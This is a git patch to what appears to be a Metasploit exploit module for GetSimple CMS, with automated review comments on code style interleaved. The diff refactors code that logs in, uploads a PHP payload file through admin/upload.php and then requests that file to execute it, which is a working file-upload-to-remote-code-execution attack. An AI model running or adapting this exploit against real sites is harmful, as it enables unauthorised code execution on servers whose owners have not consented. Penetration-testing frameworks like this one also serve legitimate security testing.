From cbfb7e600ddda5bd960fa3e57bf95b507a29143b Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 19 Sep 2014 16:29:09 -0500
Subject: [PATCH] Use Rex::MIME::Message
---
 .../multi/http/getsimplecms_upload_exec.rb | 29 ++++++++-----------
 1 file changed, 12 insertions(+), 17 deletions(-)
diff --git a/modules/exploits/multi/http/getsimplecms_upload_exec.rb b/modules/exploits/multi/http/getsimplecms_upload_exec.rb
index 48a7afa325..433b541899 100644
--- a/modules/exploits/multi/http/getsimplecms_upload_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_upload_exec.rb
@@ -67,31 +67,25 @@ class Metasploit3 < Msf::Exploit::Remote
 })
 fail_with(Failure::Unknown, "#{peer} - Unknown error while authenticating") unless res.code == 302
+ return res
 end
 def upload_file(payload_name, uri, cookie_http_header)
- boundary = Rex::Text.rand_text_hex(7)
- post_data = "--#{boundary}\r\n"
- post_data << "Content-Disposition: form-data; name=\"file[]\"; filename=\"#{payload_name}\"\r\n"
- post_data << "Content-Type: application/x-httpd-php\r\n\r\n"
- post_data << "\r\n\r\n"
- post_data << "--#{boundary}\r\n"
- post_data << "Content-Disposition: form-data; name=\"submit\"\r\n\r\n"
- post_data << "Upload\r\n"
- post_data << "--#{boundary}--\r\n"
+ data = Rex::MIME::Message.new
+ data.add_part("", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")
+ data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")
+
+ data_post = data.to_s
- uri = normalize_uri(uri, "admin", "upload.php")
 res = send_request_cgi({
 'method' => 'POST',
- 'uri' => "#{uri}",
+ 'uri' => normalize_uri(uri, "admin", "upload.php"),
 'vars_get' => {
 'path' =>''
 },
 'cookie' => cookie_http_header,
- 'ctype' => "multipart/form-data; boundary=#{boundary}",
- 'data' => post_data
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => data_post
 })
 return res
 end
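Review bot: The rewritten `upload_file` keeps a redundant temporary: `data_post = data.to_s` is used exactly once, in the `'data'` key of the `send_request_cgi` hash, so `'data' => data.to_s` reads more directly and removes the extra assignment and its surrounding blank line. The explicit `return res` at the end of `upload_file`, and the one added after the `fail_with` modifier line in the method above it, are not wrong, but a bare `res` as the last expression is the idiomatic form; the added one in the login method is still needed because the `unless` modifier line would otherwise evaluate to nil (that method's start is outside the hunk). A short header comment would make the contract visible, e.g. `# Sends the multipart form (an empty file part named payload_name plus the submit field) to admin/upload.php and returns the raw response for the caller to inspect`. The mixed quoting in the two `add_part` calls (`'application/x-httpd-php'` next to `"Upload"`) is a minor consistency nit.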
@@ -112,11 +106,12 @@ class Metasploit3 < Msf::Exploit::Remote
 upload_dir = datastore['Upload_dir']
 upload_uri = normalize_uri(uri, upload_dir, payload_name.downcase)
+ print_status("#{peer} - Executing payload #{payload_name.downcase}")
- res = send_request_raw({
+ send_request_raw({
 'uri' => upload_uri,
 'method' => 'GET'
- })
+ }, 5)
 end
 end
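Review bot: The `5` passed as the second argument to `send_request_raw` is an unexplained literal, and because the response is now discarded a reader cannot tell whether the short timeout is deliberate or a leftover. Presumably the GET that triggers the uploaded file is not expected to come back with a normal response, so the module should not wait the default period; if that is the intent, state it above the call: `# short timeout: this request is not expected to return once the payload runs`. Naming the value (e.g. a `timeout` local or a module-level constant) would also make it easier to find if the default proves too short. The enclosing method starts before this hunk.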